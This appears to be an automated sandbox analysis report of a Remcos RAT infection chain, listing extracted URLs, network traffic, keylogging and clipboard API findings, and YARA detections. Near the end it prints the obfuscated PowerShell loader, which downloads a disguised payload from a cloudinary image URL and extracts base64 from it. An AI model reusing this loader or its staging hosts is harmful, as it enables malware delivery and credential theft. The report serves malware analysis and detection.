Source: chrome.exe, 0000000B.00000003.1956901681.000029E00161C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1959222352.000029E001620000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1956408450.000029E00160C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Enabled_Notice_MPArch_M1_XS_Delay_GA4Kids_20230926
Source: chrome.exe, 0000000B.00000003.1956901681.000029E00161C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1956408450.000029E00160C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Mf
Source: chrome.exe, 0000000B.00000003.1951666580.000029E001470000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1951507573.000029E001454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 0000000B.00000003.1954122235.000029E001560000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/https://google-ohttp-relay-join.fastly-edge.com/E
Source: chrome.exe, 0000000B.00000003.1962847402.000029E001624000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/vi
Source: chrome.exe, 0000000B.00000003.1962847402.000029E001624000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1955212656.000029E0015D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1954717451.000029E00157C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1956901681.000029E00161C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1954640884.000029E00156C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1962977700.000029E001634000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1959222352.000029E001620000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1955249369.000029E0015D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1953877142.000029E001550000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1956408450.000029E00160C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1951666580.000029E001470000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1953568037.000029E00154C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1954122235.000029E001560000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1951507573.000029E001454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
Source: chrome.exe, 0000000B.00000003.1954717451.000029E00157C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1954640884.000029E00156C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1953877142.000029E001550000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1953568037.000029E00154C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1954122235.000029E001560000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/)
Source: chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: chrome.exe, 0000000B.00000003.1962847402.000029E001624000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1956901681.000029E00161C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1962977700.000029E001634000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1959222352.000029E001620000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1956408450.000029E00160C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/andboxAdsAPIsM1Override)
Source: chrome.exe, 0000000B.00000003.1951507573.000029E001454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Con
Source: chrome.exe, 0000000B.00000003.1954122235.000029E001560000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
Source: chrome.exe, 0000000B.00000003.1951507573.000029E001454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
Source: chrome.exe, 0000000B.00000003.1965049460.000029E001720000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
Source: chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
Source: chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/bJ
Source: chrome.exe, 0000000B.00000003.1965014387.000029E00171C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1965049460.000029E001720000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/https://google-ohttp-relay-safebrowsing.fast
Source: chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://googleusercontent.comb
Source: chrome.exe, 0000000B.00000003.1943407364.000029E000F4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2
Source: chrome.exe, 0000000B.00000003.1943407364.000029E000F4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard
Source: chrome.exe, 0000000B.00000003.1943407364.000029E000F4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard)
Source: chrome.exe, 0000000B.00000003.1926075173.000029E000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
Source: chrome.exe, 0000000B.00000003.1926075173.000029E000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
Source: chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiments
Source: chrome.exe, 0000000B.00000003.1926075173.000029E000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/2
Source: chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/upload2
Source: wscript.exe, 00000000.00000002.1660109646.0000024B549CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1657501584.0000024B549CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.comA
Source: MSBuild.exe	String found in binary or memory: https://login.yahoo.com/config/login
Source: chrome.exe, 0000000B.00000003.1925510952.000029E0012F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nonexistent.googlezip.net/
Source: chrome.exe, 0000000B.00000003.1925510952.000029E0012F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nonexistent.googlezip.net/OfflinePagesPrefetchingForcedOn_OfflinePagesPrefetchingOfflinePage
Source: chrome.exe, 0000000B.00000003.1926075173.000029E000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nonexistent.googlezip.net/b
Source: wscript.exe, 00000000.00000003.1657501584.0000024B549CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/
Source: wscript.exe, 00000000.00000002.1659977048.0000024B54891000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660109646.0000024B549CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1655567254.0000024B5475B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1657005311.0000024B54891000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1657501584.0000024B549CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1655756438.0000024B54C89000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1657445967.0000024B546C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660396457.0000024B54E60000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1658866342.0000024B546C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1655920499.0000024B5488D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/snSm4
Source: wscript.exe, 00000000.00000002.1660109646.0000024B549CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1657501584.0000024B549CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/snSm4#
Source: wscript.exe, 00000000.00000002.1659348824.0000024B52A2A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1656914447.0000024B52981000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1657030423.0000024B52A28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/snSm43r.dll
Source: wscript.exe, 00000000.00000002.1659977048.0000024B54891000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1657005311.0000024B54891000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1655920499.0000024B5488D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/snSm4T
Source: wscript.exe, 00000000.00000002.1660396457.0000024B54E60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/snSm4o
Source: powershell.exe, 00000001.00000002.1887820190.00000272262E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://res.cloudinary.com
Source: powershell.exe, 00000001.00000002.1887820190.00000272260C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg
Source: powershell.exe, 00000001.00000002.1887820190.00000272262E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpgX
Source: wscript.exe, 00000000.00000003.1658235921.0000024B549F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1656064498.0000024B549ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660167889.0000024B549F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660396457.0000024B54E60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.gravatar.com
Source: chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.com2#
Source: chrome.exe, 0000000B.00000003.1926075173.000029E000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=blockedb
Source: wscript.exe, 00000000.00000002.1660167889.0000024B549F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660396457.0000024B54E60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://themes.googleusercontent.com
Source: chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tunnel-staging.googlezip.net/2
Source: wscript.exe, 00000000.00000003.1658235921.0000024B549F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1656064498.0000024B549ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660167889.0000024B549F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660396457.0000024B54E60000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe	String found in binary or memory: https://www.google.com
Source: chrome.exe, 0000000B.00000003.1926075173.000029E000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/2(
Source: MSBuild.exe	String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: chrome.exe, 0000000B.00000003.1926075173.000029E000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/b
Source: chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chromesuggestionsJ
Source: chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chromesuggestionsJK
Source: chrome.exe, 0000000B.00000002.1994179249.000029E001D4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/coac
Source: chrome.exe, 0000000B.00000002.1994179249.000029E001D4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/coacEnableFullscreenAppListEnablePlayStoreAppSearchEnableEverythingProduction
Source: chrome.exe, 0000000B.00000002.1994179249.000029E001D4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/coacEnableFullscreenAppListEnablePlayStoreAppSearchEnableFullscreenAppListEna
Source: chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/coacbE
Source: wscript.exe, 00000000.00000002.1660167889.0000024B549F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660396457.0000024B54E60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com;
Source: chrome.exe, 0000000B.00000003.1926075173.000029E000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/chrome-content-suggestionsb
Source: chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
Source: wscript.exe, 00000000.00000003.1658235921.0000024B549F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1656064498.0000024B549ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660167889.0000024B549F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660396457.0000024B54E60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/chrome/duplex/de/change_password_scripts.jsonb3
Source: chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/chrome/duplex/de/stable-experiment/change_password_scripts.jsonb
Source: chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/chrome/duplex/de/stable-experiment/change_password_scripts.jsonb3
Source: chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/chrome/duplex/gb/change_password_scripts.jsonb3
Source: chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/chrome/duplex/gb/stable-experiment/change_password_scripts.jsonb
Source: chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/chrome/duplex/gb/stable-experiment/change_password_scripts.jsonb3
Source: chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/chrome/duplex/global/change_password_scripts.jsonb3
Source: chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/chrome/duplex/global/stable-experiment/change_password_scripts.jsonb
Source: chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/chrome/duplex/global/stable-experiment/change_password_scripts.jsonb3
Source: chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/chrome/duplex/stable-experiment/change_password_scripts.jsonb
Source: chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/chrome/duplex/stable-experiment/change_password_scripts.jsonb3
Source: chrome.exe, 0000000B.00000003.1945970180.000029E00111C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 0000000B.00000003.1926075173.000029E000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/android/translate_ranker_
Source: chrome.exe, 0000000B.00000003.1926075173.000029E000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1947143045.000029E000320000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.jegs.com/webapp/wcs/stores/servlet/OrderItemDisplay
Source: chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.privacysandbox.comb

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49903
Source: unknown	Network traffic detected: HTTP traffic on port 49903 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 160.153.175.102:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49903 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 27_2_004099E4 SetWindowsHookExA 0000000D,004099D0,00000000

27_2_004099E4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 12_2_0041183A OpenClipboard,GetLastError,DeleteFileW,

12_2_0041183A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 12_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,	12_2_0040987A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 12_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	12_2_004098E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	13_2_00406DFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,	13_2_00406E9F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	15_2_004068B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,	15_2_004072B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,	27_2_004159C6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 27_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

27_2_004159C6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 27_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,

27_2_00409B10

Source: Yara match	File source: 27.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001B.00000002.2444877297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 8804, type: MEMORYSTR

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 27.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001B.00000002.2444877297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2449621046.0000000000E08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 8804, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_0041BB81 SystemParametersInfoW,		27_2_0041BB81
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_0041BB87 SystemParametersInfoW,		27_2_0041BB87

System Summary

Malicious sample detected (through community Yara rule)

Source: 27.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 27.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 27.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 27.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 27.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 27.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000001B.00000002.2444877297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000001B.00000002.2444877297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001B.00000002.2444877297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7356, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: MSBuild.exe PID: 8804, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '0/LucV5/d/ee.e#sap//:sp##h';$restoredText = $originalText -replace '#', 't';$iLnBGeoOpffqoUAKmlhR = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$WhccGUizbJWaNhoCLZCL = New-Object System.Net.WebClient;$NGKHbmbLgczBefhfOAGi = $WhccGUizbJWaNhoCLZCL.DownloadData($iLnBGeoOpffqoUAKmlhR);$KodpfKtodcZPWkkULGWU = [System.Text.Encoding]::UTF8.GetString($NGKHbmbLgczBefhfOAGi);$kQbJzINbGPimbikLeLWW = '<<BASE64_START>>';$KNIAGgPKpufLIacbNxjH = '<<BASE64_END>>';$txWWUeAUmepGGoaWUeCB = $KodpfKtodcZPWkkULGWU.IndexOf($kQbJzINbGPimbikLeLWW);$TPWfGTAfLfnGqWLfpiIW = $KodpfKtodcZPWkkULGWU.IndexOf($KNIAGgPKpufLIacbNxjH);$txWWUeAUmepGGoaWUeCB -ge 0 -and $TPWfGTAfLfnGqWLfpiIW -gt 